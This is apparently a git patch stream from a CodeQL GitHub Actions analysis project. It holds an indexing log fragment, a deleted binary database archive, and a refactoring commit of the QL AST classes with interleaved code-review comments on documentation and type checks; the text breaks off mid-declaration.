"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", - 
"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" - ] -[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. 
-[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Terminating normally. 
diff --git a/db/src.zip b/db/src.zip deleted file mode 100644 index 3006b787babfbfd5da405e1a7f5736ea762e4abe..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20479 zcmd73Wl)?=*DZ{DaCZvF9=$%$0AOuStE+Ek0<^THw>GDL{7-so zdw`8I?c<{@z5M_Ab9zDL_p}TgEcA5$^NIA1KpQhdbD*Owy{?Usy{)#st}Q^@*3RC* znajjN1INZF$?Oc&y}Cn*(Z)h$qNQPhuIjqq{pAV<;6xZdi7RM%>rGdJcI6PG$1pW- zHLP(e=HXFQSm?gQtQO~}CK!WzX8 zj1>&|D`AI@r8)Dr+EOF!=7$WDI#%q3?1~g2)@CI7ykZh5rsmV~vH^0`ai20jwR|?@ z5K4++4dHC*w&&*DbdH>iRP=~pP>i-*j%slHC3}_8a%mKEKqOq4@w0scF%xSP-grcRt)Sg_1pe(VzqhMUDTE0L{+$e(R9idt= zL9THPfpa}q)M#^zlQUY2Je4OMhw|y#>qKN|gwY1l*(3&1zNHKr*wS3;@Nq zFz>|yKG3$}&yx=jR);ei?n=Z}HXW@VLT11GVYYdvmGQ?@E^@ zV%X`)uHVY*z;2J2-0)i)$sdeq27l7|xwSX@O(SjS!Vh1^Zo5>?s6Pu%K77o3)QL$z z1N3pS-dccepFd2+^}~eyJ0}ZhVF9qT(>AfSwFf*-Rzu_JdECrf_`V1V@*vZi>WWA6Au$^UEe|A zsqE$3^{pe3@3O^77}hF5zxYgGPq(kZi4cKLp3(u1&RH!93bWr_d{_Rf>ga$}AfQ@h zquT?nBniz&85yX=P~#rn*yA#HXpefczFGH4SPK! zn>IjOTgFH6_N!XhPP3uj?P+`U)QIh=$fZH<8sjZ>T1r?RilSD-T z5mQ3DKX=6hq1vJ?U5~0cUU^UI)xK9g_+7`XE6r3Bjz?9*9wpaiSpA3wkebNoM|g5Q z($?3Lfz?xZUy?H5lyu}?(dSG-#$!!%#ZT>XC+dVci{ZEjZ_NvH*$};OT{ryke2L4^ z`{EACQQC4I^Kjmy-tF4GasA!d7jS!zc&LCuslA!)AH2fQ?C%g#(spL(IU_DT2^iug z8^Ay4_0hn8F!1OSSRv)al+}B8vX_BO-CFi;&FOM+Ye5>vxbEDFMVzHoxk}_mj2|oI@EFNsh@ccFLsSQ$oqvrp!yo{OvgA#N`~ygGP44F%<5P#@2gQUV)~u zsv@Y4k-d=3Em@S^xuNUgaYuaFNdtZFDJ#}Yf0~)5tOSWV^-KW>gRo14vQ6L+3c*2M z%P3L@k>b~7lqXMtC5laH^?IqloT7KTx;jl>G&r$4F=yAQe*59T7t?lUUlsa9LQl@x zzOrg@F{HfudK{Wb?P|4*<-LjBDpsEC=Z-y}Y8ThBlRDS|7hpU-q~6gGvf?$SL)X3Y z-7P=l63zuSu0X@*%{Egc&Kz{{vl>)+>+Uvy*K*+5DX8RKjTP>&;eA@s>miI!qvCl9 zr?b(;vD5wEV2yYO_eblZjGJ)3Zmq);zsYMP;cm~VNrT6aiD1{+^|-g5y2aYRv#)ba zmvq_xUN>e*6DT%I3*sYBH**z|mPCW10B%!Gzgtoah>E0b z5x?lEab@qQh|13ZMgL@oD6#JVVm~Gu`5r-E#u`8SH-*P#p6^m94%onIVFliYJ$yp! 
zrmL=|1$vwV0dG^#91>n3aenl94$F**_+tPimm{SrBr{g5dMbnG<3da=?hb>Ay?yrK>ERjg09WSNtMkJ3bAvN8zN-Yng3z zWun6D?0mI#deA3Vpf?KT#QK$5**#6(6>Z2zJyq|MQQ;fHYZq?9I_@u>`taV<$MG@^ z0_pgblhVAU>L1g?)9Rhsao*k+bqwd;U@U`4t#(952+U<|67DGmQjbH`4$`bBZK(~p zF_o7Aku4h!S%Q?%**}0Em6cZyN_)5+9<&>uETy-uSJ}z;_$uk7=`&DAsKUe$sCS+F z;Kfk`W;wRw^4yJ)pxBTCk>j@JIyjV-3-LORuE*`f{wy))m+3x(Rhyop0MyWBr1k8snr&h?$}N=LP0UF za(ttr5HmdAA3|~Npb|yTTw}65tjk)LfA8gsz~vX8UaUnUB+KEwoiqPpUM);v39+`w zAqBenTT&$$Q-i7VpdMOFMpY>DL;Z;U1xT^;A+AXp{vgnIMD=72Chb#mmkiz} zwvmRNMlYS5S7DbPXp_FNbO@NAgXH8cvb-Ten5g|`8IsGM0|t3wgByn-8r8s#ZHfR( zND|GyV$Sh_?COu1ydI&C<85!j4W%KDw3)k!7pyzR#uzI_uNNdLT95IRl9l<@mOlGY zyv#O>->wj8@va+XMl%6LDhbsdWg`Z!^Mm2&QT0+uT!3SWq2MxP3e$+q@7fA|3pLwC zc48m;s(|2?co*0N|4j7ZsK?Ix3MqP0NV^kfg zs>=o@VB}FB!cQV37T>yB1dIEP!Bw(%rsI0{$dQIv1%3K?A^*)kKf5zBtNP0~RsQ-W z%oecuzOo};+O*LU%PBU=H8v|vAA}J@5kFAHR*k88el}8A7TOMdjS6K6mEkO*xi2CS zE9m_6nlzOB)pp75^}r;f!Ywznxyi$zvJ<%3)Vw|Zn5`G6+^d}`-F;%9#Z^X#+4hG9VHa;G&O|nIVphq z8tc?m1(so0(v3HfeFqzWue=XJjmz`B49aXS9(JgQ{K}0_AYiwAo%Jjj z-!LJVI1{$GxMA8^fOQO0sZOG!w9Ddf0I*VQhk^ZCkOi8zkWaJjb^e!9UMImyWiU)3 zK!Oak-dDm=Zax;-lB$XyXg}uS(T(~|nKRkuCx>hxvuas)#kvXJ;lPnXCiQlb*Y|YW zC)=(7lrzo6gwWr5gTrJNWXr`JV%DOFEQ?|BNelcOw<07r(Tnp@+vJp2bC5-HmdP#9%eP|f1>k7s7den7VhPNU`1?Bs^CPs8^Rxi1Ws2mX% zyz9OCYN47v9$K;0URy2oJ9}t|&dUk}FA?z#K;m&ge&4z-C7j^xMq9|qWV-oaAtKQw zNo;y8dhFE%j$uur&m1o2BqLO8n#zN8DVmg6jGGw7@2QJsV zEToB(u@N3!eJqQQ(kX_l7o%iFu@z2^O4(^&S+moMD}%U$CYfn|5=IR{P6eCn2kb@* zA_99l0(~;GSarT!3N5#Iy&qfNeQS4GHf#%8GloQ@ z__TZ-c!5Hjd8}tfmS25if#+^twTo|GG~fP)=jZ0m*{bP+ecSijI5)l6<8SJfhEc%u zK#V;{qus15da=;mpUPPfbLLa0W1BVWxZl)D#-j=e_Y;;*t!}#-VM^batr>|_^^n^I zP1|zJEi5F@SkQ-b^j=%$fs;ey#%AYV*L1d3c$!Xqr2m@w7L}rpIrsb0_eKPVd>?Zc0xJ*B!m% z=_uelec>@`TSC7EPBg8}ybA1Jvuv}+HN1y@JVH;aPME~Nfq+C3|C^7{OpizCb`=ZY zhzRmsnl_^mvPpJ_r5d|&HmMpee+~I+QWLDERGjvBw_K-L{q_pnN#p!Z@q84!D2H{e zSP_k@!&;(|R`o|un>1AQnfA7Dv?Y1zh_?FV04oMG(lyQABsoTL%@KXuZPL_%6b3t* zdpeu7zV#~il9`AarOxe(S1T7W5%LqZT6QzJukMbqnh#6yQr>cH;uAzJOsoqF=f>qL 
zs)@(VK#{21nBfHr-{uNi+*q&M!j~MPWOG735w#}dKO8n-TKulwW%?@pf4O%8!5+VxHr3n5}Z$C4AqNjycwzg8-t1w#oIp_&f6LR71x5hg_Ba`x?w(>yQHd0!0>U92RK z@&4ue_oLpv{r0nK1?_z(3mlOW0*a;BCf(*tjw>ilxp1vLmoxw#1raxILNQ!p#JNLm zRCv+E)Xnmo?{s#!V&3qm$7L|ugMp5{a-g-_#PN*1Z>!1$w6SWa-t)1R(%~xJscKPN znI2ZiCVY#;2`$AHS1gVz{>0@?tV!)r_M=ro5W-oT3dJPspiWMO?~}W- zGJI)cq5CkgPn)$UDUBUt8@0(cx4GHQSIo|}@+H0;>24x|m5}XTX-%h_UG;G@$uhpC z&)&d-nZ`zXL|WPG0#XNvD=*361Z<&IH!TD?S~XU2c|{8l4&xlGq+P@A{TfSGYQ-(N zzyj`{*)CzD8ex0eSQ~?an=({@Vi}+wYFmB;5W})@>xIK8-G{G~$*>AHxN315lDc@ol493TsaDnxQP=6@>;;w1AF&;{Y}=~s&v>|#{mcPS%7@c&onzWc$3~q!o&&KNXFv6q_W1i zMO7m?q8|$1@idXFt&}=O2X*W&bghQ#eoj$k+J##fSJswO*|6@N*Ou&NWRQ|0>A35U z?isp^`D${Ia`YDDZ-tjKqh9(>vbn7)*2-MG4Kf3E$EMsP)C7u}9pW@;r>3i&I;PVNGU z=#Uuy?{gli2?d~X;L|I*5YPg1Mk_4VRvn%yOc(5&Z?{rfGJuG#%O5tEwj)Q`DyC}j z+K@V}vQR6M7pMgdHLbShsJ>2FoKR+runaFB`|I#7WoOQW5EY{)I)&w_iVQ4I+L#ys zu4vlU7fDyz82y`YPoVo=eY%XzJYvFaXbg&nD>ExfT?+SogGOWviYns8ea1g3LFQoyVRu`noZBR9FG%f z-;d)N!h;+h2(|b3O1B<2R~CJ45`o`Ic{`%I7Jj4LGPfCEzjooSF0WMP`*o}&51)Rz zh(#L>(*zAqw)A>HKMn?ZA9aitTVBdi3lx6!UQ20DCjlxyKw0ER0n%bb5P##V{UplW zefX7v6Ty~Cah!qu`RbKCgv;@U<@=BGxbI!FE|4BKI1iSnYbGcVkYTic^9INKxWN@E zOa5&-mFtRyzAqoS&_R;*GQoRf+0$uAFwohllok0*d<=O355_&dZ& zh>qlF6jK=AM@1PPhD-RTBYkWc6wYdBKG>NCuoE`E^=&>V)`1f#NL=uoR|DztgP@Cx zU`4M0`Ft4f?~7^R<;jOW)S2`-$q>9RMQUMG2!hC(_`(20=1l>^Jt(RuJ4Mb6y(cnt zCQGbOQcp0I-{BZUnzB#hd%Z9XNM@h)4+gD@fh9xaFD4{aP$grlgk$K{W)_u66RDb& zGT`ATc#vyu_sSR`Phr41Dg)K-;a`X=#Sxpl#}0@Or5EWgi*K^Y&UnvPfF3t!;}5|; zh)}MZf=yvGU|M!&IZW@`9U&CLv8td)qRPuEdKko7^W94$xW^SQfVJWh3BE4PfHVD+U?N8Cq{YM{{2~W3aziu+3_V>^N&$nqC{rww!yZN{ z<05`2Mu!F1$*MGsy1A=4j|#^s3y1Tb8a7X%ObxFA^#ffg6atK|(Lp)NlmmP$B~i?= zl6?>?wu~fE5ndHRI!z=S!e~s=*h@{ad}AL1 z1+-Ig9<0$MW8;u66^d8+sp(Cq_b;cQgmo{NLyQn_q;W35-YAoY8=kt|3$Ns>7jfpY zy~YFaW&qh3IEv~k^{fHz<(pJb8S_*5;&{A%Q^sfzb!ToRKyxZmv{`RE_HH2G@)YPa zlQ9bA1s@(53urPLNp?Q2`PR_Do1UtX>XxkOQD4KuTMkeM6;{U=${Vg7UTeclwm-$| zDGCb8sVuPD5ueNG3`1!SjRc#)S`1{1{9Oc9%Z zfa4n3-eH88iU&+0f{vrzP;7#$DP*UsnhLr;}iuB zhh}Lws&I1i$!|c#Iwl;&uq 
zZ)U$W^feemb20e0>V_<9_qzO0@%Wyuwn0=kr;v&{V0jxq2|&3g4Qe3RXzbdq&28yM zOrEFhXl{HA$fO7>QcDmZAg1tt3&?)Ym$Wx9vDLS?wS6$CAA@pi7$c$&1H$|BlooJQ zc^l6eDCjSu?|0#*W2xI_#W$MzE>7o0um%|3&=ybm3Od1=B7!Isw8`aS{g`^wv{fjJ zI6M54n=U$XDrj`0$m6vGeL6>IYgKcWs=dSsNtGSXOS3BEoogq0!NkUft6$EXoFUJE z<-^zi_VD`eu146ufgtS%m;ceE`$g0sBiw_R3OO{JJ0#O(K-3gZRZ3CSx;?DDrINF@7<2m~ZCwrUQ`>UF=G;wyFwWzA zxCKgt=kS-GMoCgY68Au$>0dqJkI$z(6AN7zH)f1agefd`)%L=Tbs$y31zP4JG4^Is{)Zth?gZIlDo) zhYX01FKwz7S=i4eG_w7{5OqX7{tKemuoXSdL6wxbmN&=Nb_QU^y9W)*k4qm#9W?UtL9xaUo63KWm%h)a z+K2Ke8(LGK-lJ6g9lTigV9Ib^yg~(Tyup8^JACebBnu^hToQiyL z%?|8{U4~d&Wqb5p`N6d*IsaDY;gq0j*l)Bm!uQ5Zayf)69xmNhx+@NNBbNBGVXc? zj^;fU7T&GE=$EUSf`Zk)4w@>=;E6yVSzO4=((>uC<*#eeUeZP3ku&CiK9})|@TAWj z+N>XOUec)CEm3oh9JgkQ_#7PE6Wd8fed?2K7~a*q(+yE6|7nuqeseULGO$+;Vi@UJ zYcJmrNcYO>%r24fv(vA1rLFpl2F{1M{`S}U3GZi|>&I%9huR|DhoBVE4EHe8{`+s= zBl@JBfPP4nts8P+Cy=BG{o$Bi>NDJ$!U2(~eMjzrfN7ZNn~m;2M(sH)JaPR+!RjX) zwozIX^EW*md6iaXS6{b57P3-W)qGbwayWJgStR*;t8XHy+K47W2$iPbG*l7c&YdfA z3)ybk6x~>iZ#R+0T7EKN*7BBV+6IJFPwe}D@V?|!TsK(fJY>v4>~4RxwX(e^l3WRV zTtJlud7e2Bl%4%G?0Y>QsTR6+HYQHLR*$?SaFhYLVO<#k(!}H?G&OQwBz5H$s24Tz zl8R#Nn?!RBd@iRB`00=L1LO`4KMC_}M7WRV`s&|=kMJm2SuNt-xWleT@@SY=2fO$| zzhBf;1VMzDa~svLb;PZi{$K*ZKw}TzWwy z4Jjn^+o?D%s6AhQo=bo8jc6z`L4G7^{IIox5=fhTk1!#rd<&=nW_@iVv>tvQ`HIGu zzDc>>A^TTyr8OpD@4Y)agLoO&nJ51 z+4kfPIcADdtw8g?5S0f=5KzgL}7(lricQa081UfrV5v{D1_vcgyT ztlGY74KJ~+y7^q&{loRul`|Hi@TGJ$=l)4%>s9Uo;Ho)Vmx!&sv3J^nZgF6IU#=+r z;3p2-R1#MW+YHIdd_Y4rL=lqB&q~{lqMjMqzTySlT;tKmS845GS$B|+^0FbvMJ{=e zRyg?I;Ezrdi7OL15>vDGbo0im;{Gto7^jUhywHgk^y0j3Rv%(|k$HwH(=?!f?iZ z5DP`zJdT^tqC!&0mtu%RtF=zM%yE59rX&ZnaDOn%)@~PfpojqP_C*Hr*$hL! 
zf_{l3PPFBHp9m2yEQ0uT|5E+X=8E!YkW|_-UT5~asAYcOs-S9yvA;~Pa*7(x9VSh& zBJuM(n8RP0G6q#3`(s65+F!%K^Uu>SGsrDc8u(C-*1ms>E{%qo%a^lTw&z{Z%3_jh z;)pI65A`Fvmx!I=`?Umojvj6#ZnwjY`(S143k)Z>K_;UR1mkE%aq0OW0q*vu9`P@x zaBdJVEOOH{)87>1FTo4>~^T9N2CwSG}{R#k>gs* zZt{+xHZ^KZ;mIo!w=Q+%Yy>&u9B)Sk#dxn65~U_ZHVBoIb|nOkuDr3iQO0N0{kkP$ zd()b%7)r?fXFJiYwCPN^3`amu-5OyCbOR`B*@uDS5AL5C+v5a|*7I5AB4LKj>a@7; zxIXamc~Rl1hz_3H-I%F-{TfzoWKAal%)K0{Co}15V62!$gw=BKN@pCtEQX%avtd7( zPEFmz`C2N;*yr$ryyfu1`$rfjs9a@hYqr^ZuhroJgNp*EI8M6uVRn|(AS`jdrKUp(Q+mAbUuhW_9AC9EZF!laE#03u= zO8%AQ$E(*fRn-3nmY?43bE29NeTWhG_T3=^UZyR8-{63&K*P&GwF4OMu7?uMJ0+zh zN4`&F)B15Q0nKk&E%CI>1fjZ2GEg0M;Ynz2~|}MGtf;{gv>4i>&P) z8X5qh9wE{%zSYwrb($PK{WOZ+^yG&x)Q6A1@RiT>sFH= z$xhNzRs66*3qMeK2lGJtns7EDk}}#kouJgEH{|Tq26;%`+_kG+xVRVD8gpWVwwI_H zNo21%he3?9B~R9R)QKg#=}8|pk_v-Ui~!X(%2zMO==g8p=6(sCjd^dV{(<+_zw++! zoI{<=C=z{~3mE)p!FL?gEY$t(rvpe&7h)!mx1gZ*LI@1dNS8f+abuVwG@qfH zD7eKt?>I}_wQ#2W_C4pDjfD@5g6WJ!v|5Zo1Vh!@FWRx&gbdDjTFUTawrQaO!U}{{ z(~Af(^p|y!mL1X#DHvn-x0MApyeS_#NmT_@5ehFgkK?-%@kFN9CEw`|$-dW8S;f zb;sDe7c^&i^n`%v>wAm{n>hhXQVNisA5HCfIY3`7gKvRst3t~}OlGaYJ?8EN*8#dl zKZXDo%CCtY7bjtetA@^l7C!&=Uh|Bx?y;Zl*QGg1R@#RF-EaO9&?$oGEOr_6?4ey$`@cBe$f|}|B_{m;`;)HijX~TY>eM{-( z4H9P1lei%aE3`kwMnzvl8YT*W`=sjK5i@c@jnL|@fA)qd#H}D5%n>JS2&+uwr-O~I z+qD8ko4W~SaWIV8K~ZtOz2{3N9CDFm#kOPaSpINu!a}w4Fjg-rF17! 
z2hd6Zg*yTg>l0sj2k9z|lz&L*8kt4v#BC-oyV4ZY6m5u;9sD%8k;_KCbsmG!5P%SC zw1f{`W3Tl{LRp&S<|aaD8Rp?9yz@iQsrRpWPpD#`xecPMg8dR-Bibi2x0f!obHSy& zu6@_0Hi;hVW3S)#C<^`^QL~+VI#&PLiC{|Vv^is&3Un*Pm;qHxB?hM)K6X{6wCxoaQ|a00Q>NfZ%n ziaVY%V|9Ylph}d{fa}Iw>HMOYTKVs3;InlaY{Y6iVAZJ|(!MQmPQDypVZ;P5p zPEvEQ8#V&_7rIcZ3gP zlxEQ$$wmilihi`uO8>fVI{t5w{XgxljP(EW{>;VmlnvKOmcF~<8>(@c(?i~}=&YK2hlx?BogE!JdKv7~h@LltpiRd;HO|5Ld7~<) zilBFJufH322!9G~Zdp-k2HMyF#>V5s>uZBYEjD<7L4N4hXu*0>gDnID*^npjJ~g{s zec9qT&>!?h7jLEt!tu4N@ISl$GJqU{?tsw`tn5F${(CC@f0;L?C%joiYMMUq);Vtr z*9_;ZYU|03R0WQ3wbLO+x~7syTkZR!PTHonw3!&W_7R_`eFW5|bdRgZi5a-_RWXOD~)jB}=w5^IxW1-*W% z#HDP3!B%Jr!ESG}D&s^dA9u@$C4tEkCM>Kj-Y=s1=-Lb+FSoyJj0B2u3w^R4$pWlO zcpECmX)K0kH1I5BOaPIp@g&G?IUJp2)pOI@?~KmyX7-^3Lz2xU=`n!Wo(@|-6c%ZR z_8XYt4*5DsS-`zQOh5Zm=mVcd3K*7*Kem8DEZOwgb-2Ufyrc394YU7p>|0nRL zZK{u*!@mdn!`gl(;Qvn_@t>%lwt4;&_3A_Te=gKdTRR_v(4VNEwo^W~RsJ68kpB+U zPa9JIME|ss-Rn2>ho}69^1tWe{QqwN{S)rfy2O9N-9dR?xW6tCf5LrQwewH7{n*b7 z_gCrUpKzbn&^(qB{T^C`&j$COg++ftep=){0aAI!N6lN%kObX@@#PbTWQOm;Ga6+k2MXy$5-;_1OK$b;ZMX*?d8Yp$nTL% z@qCDX`}BX}ed<^KQ_Tmjo(=DB3;a*GPi?zLbME($rhYcKPc79y0Y9~z{t5W}^>YLM zk9*%!_vXLH-2$G{gPRNFB`lY+#>Q41eN%nt}Z%UM$vU#`_-w$Gu|2Nt9C&;IX knty`4;`(0&`82a8BM$j+O$GtMefVKQ1p%q%dHn7F1A{ntPyhe` From e5527d7a181a0c37cd6fa3d8fd885f3ee1e3092b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 5 Mar 2024 19:59:43 +0100 Subject: [PATCH 0086/1267] Refactor ast nodes --- ql/lib/codeql/actions/Ast.qll | 281 ++++++++++++++++++++++------------ 1 file changed, 184 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 89afd954d85..1d86d81a063 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,19 +1,51 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +newtype TAstNode = + TWorflowNode(YamlNode n) or + TExpressionNode() + +class AstNode extends TAstNode { + abstract AstNode getAChildNode(); + + abstract AstNode getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract string toString(); +} + +class ExpressionNode extends AstNode, TExpressionNode { + override string toString() { result = "expression node" } + + override AstNode getAChildNode() { none() } + + override AstNode getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override Location getLocation() { none() } +} + /** * Base class for the AST tree. Based on YamlNode from the Yaml library. */ -class AstNode instanceof YamlNode { - AstNode getParentNode() { result = super.getParentNode() } +class WorkflowNode extends AstNode, TWorflowNode { + YamlNode n; - AstNode getAChildNode() { result = super.getAChildNode() } + WorkflowNode() { this = TWorflowNode(n) } - string toString() { result = super.toString() } + override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } - Location getLocation() { result = super.getLocation() } + override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } + + override Location getLocation() { result = n.getLocation() } + + override string toString() { result = n.toString() } /** * Gets the enclosing workflow statement. 
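Review bot: The QLDoc `Base class for the AST tree. Based on YamlNode from the Yaml library.` now sits on `WorkflowNode`, while the new root `AstNode`, the `TAstNode` newtype and `ExpressionNode` have no documentation at all. I would move the base-class wording to `AstNode` (`/** Base class for all AST nodes: either a YAML-backed WorkflowNode or an ExpressionNode. */`) and give `WorkflowNode` its own line (`/** An AST node backed by a YamlNode from the Yaml library. */`). `ExpressionNode` returns `none()` for its location, parent and children, so its doc should say it is a placeholder that cannot yet be reported at or reached by tree traversal. The branch name `TWorflowNode` is misspelled; rename it to `TWorkflowNode` here and at its uses in `WorkflowNode`, whose body continues past this hunk.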
@@ -24,7 +56,9 @@ class AstNode instanceof YamlNode { * Gets a environment variable expression by name in the scope of the current node. */ StringLiteral getEnvVar(string name) { - exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + exists(Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) + | env.(StepEnv).getStep().getAChildNode*() = this or env.(JobEnv).getJob().getAChildNode*() = this @@ -32,16 +66,23 @@ class AstNode instanceof YamlNode { env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } + + YamlNode asYamlNode() { result = n } + + YamlMapping asYamlMapping() { result = n } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends AstNode instanceof YamlMapping { } +abstract class Env extends WorkflowNode { } /** A workflow level `env` mapping. */ class WorkflowEnv extends Env { Workflow workflow; - WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + WorkflowEnv() { + n instanceof YamlMapping and + workflow.asYamlMapping().lookup("env") = this.asYamlNode() + } /** Gets the workflow this field belongs to. */ Workflow getWorkflow() { result = workflow } @@ -51,7 +92,7 @@ class WorkflowEnv extends Env { class JobEnv extends Env { Job job; - JobEnv() { job.(YamlMapping).lookup("env") = this } + JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the job this field belongs to. */ Job getJob() { result = job } @@ -61,7 +102,7 @@ class JobEnv extends Env { class StepEnv extends Env { Step step; - StepEnv() { step.(YamlMapping).lookup("env") = this } + StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the step this field belongs to. */ Step getStep() { result = step } 
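Review bot: `JobEnv` and `StepEnv` (hunks `-51,7` and `-61,7`) no longer require the node to be a mapping. `Env` used to be `instanceof YamlMapping`, and only `WorkflowEnv` re-adds `n instanceof YamlMapping` in its characteristic predicate. `lookup("env")` returns whatever node is stored under the key, so a scalar or sequence `env` value would now be classified as a `JobEnv` or `StepEnv`. `getEnvVar` still goes through `env.asYamlMapping()`, so the visible lookup is probably unaffected, but the three classes should agree. The simplest fix is to put the check once in the base class: `abstract class Env extends WorkflowNode { Env() { n instanceof YamlMapping } }`. `Step` in the hunk at `-326,41` lost its `instanceof YamlMapping` the same way and would take `n instanceof YamlMapping and` in its characteristic predicate.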
@@ -71,27 +112,32 @@ class StepEnv extends Env { * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { - //class CompositeAction extends AstNode, YamlDocument, YamlMapping { +class CompositeAction extends WorkflowNode { + //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + n instanceof YamlDocument and + n instanceof YamlMapping and + this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = + "composite" } /** Gets the `runs` mapping. */ - Runs getRuns() { result = super.lookup("runs") } + Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - super.lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } 
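Review bot: The commented-out header `//class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping {` is dead code that this change edits rather than removes; it should be deleted, since the characteristic predicate below already expresses the same constraint with `n instanceof YamlDocument and n instanceof YamlMapping`. `getOutputs`, `getAnOutput`, `getOutput`, `getAnInput` and `getInput` are public and undocumented. A one-line QLDoc on each would help, for example `/** Gets the input key node with the given name declared under inputs. */` on `getInput`, which makes explicit that the result is the key node and not the input's value.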
@@ -99,34 +145,43 @@ class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends AstNode instanceof YamlMapping { +class Runs extends WorkflowNode { CompositeAction action; - Runs() { action.(YamlMapping).lookup("runs") = this } + Runs() { + n instanceof YamlMapping and + action.asYamlMapping().lookup("runs") = this.asYamlNode() + } /** Gets the action that this `runs` mapping is in. */ CompositeAction getAction() { result = action } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class 